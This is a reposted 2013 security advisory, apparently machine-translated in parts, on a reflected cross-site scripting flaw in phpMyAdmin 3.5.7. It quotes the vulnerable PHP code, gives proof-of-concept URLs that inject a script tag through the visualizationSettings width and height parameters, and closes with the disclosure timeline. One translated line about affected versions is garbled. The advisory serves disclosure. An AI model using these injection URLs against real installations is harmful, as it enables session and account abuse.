Advertisement
Mayk0

#; phpMyAdmin 3.5.7 Cross Site Scripting Vulnerability

Apr 10th, 2013
179
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.10 KB | None | 0 0
  1.  
  2. Full title: phpMyAdmin 3.5.7 Cross Site Scripting Vulnerability
  3. Date add: 2013-04-11
  4. Category: web applications
  5. Verified: Verified
  6. Platform: php
  7.  
  8. Description:
  9. phpMyAdmin version 3.5.7 suffers from a reflective cross site scripting vulnerability.
  10. ---------------------------------------------------------------------------------------
  11.  
  12.  
  13. Reflected XSS in phpMyAdmin 3.5.7
  14. ====================================================
  15.  
  16. Author: Janek Vind "waraxe"
  17. Date: 09. April 2013
  18. Location: Estonia, Tartu
  19. Web: http://www.waraxe.us/advisory-102.html
  20.  
  21.  
  22. Description of vulnerable software:
  23. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  24.  
  25. phpMyAdmin es una herramienta de software libre escrito en PHP, pensado para gestionar la
  26. administración de MySQL a través de la World Wide Web. phpMyAdmin es compatible con una amplia
  27. gama de operaciones con MySQL.
  28.  
  29. http://www.phpmyadmin.net/home_page/index.php
  30.  
  31. Afectados son versiones 3.5.0 a 3.5.7, no las versiones vulnerables.
  32.  
  33.  
  34. ###############################################################################
  35. 1. Reflected XSS in "tbl_gis_visualization.php"
  36. ###############################################################################
  37.  
  38. Razón:
  39. 1. desinfección insuficiente de salida html
  40. Vectores de ataque:
  41. 1. suministrados por el usuario los parámetros "visualizationSettings[width]" y "visualizationSettings[height]"
  42. Requisitos:
  43. 1. sesión válida
  44. 2. "token" parámetro debe ser conocido
  45. 3. Nombre de base de datos válido debe ser conocido
  46.  
  47.  
  48. Php script "tbl_gis_visualization.php" line 51:
  49. ------------------------[ source code start ]----------------------------------
  50. // Get settings if any posted
  51. $visualizationSettings = array();
  52. if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) {
  53. $visualizationSettings = $_REQUEST['visualizationSettings'];
  54. ..
  55. <legend><?php echo __('Display GIS Visualization'); ?></legend>
  56. <div id="placeholder" style="width:<?php echo($visualizationSettings['width']); ?>px;
  57. height:<?php echo($visualizationSettings['height']); ?>px;">
  58. ------------------------[ source code end ]------------------------------------
  59.  
  60.  
  61. Tests (parameters "db" and "token" must be valid):
  62.  
  63. http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&
  64. token=17961b7ab247b6d2b39d730bf336cebb&
  65. visualizationSettings[width]="><script>alert(123);</script>
  66.  
  67. http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&
  68. token=17961b7ab247b6d2b39d730bf336cebb
  69. &visualizationSettings[height]="><script>alert(123);</script>
  70.  
  71.  
  72. Result: javascript alert box pops up, confirming Reflected XSS vulnerability.
  73.  
  74.  
  75. Disclosure timeline:
  76. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  77.  
  78. 31.03.2013 - email> enviados a los desarrolladores
  79. 31.03.2013 - email> La primera respuesta de los desarrolladores
  80. 04/02/2013 -> segundo correo de los desarrolladores - XSS parcheado en el repositorio Git
  81. 03/04/2013 -> phpMyAdmin 3.5.8-rc1 se libera
  82. 08.04.2013 - phpMyAdmin> 3.5.8 es liberado
  83. 04/09/2013 -> Consultivo Público liberado
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement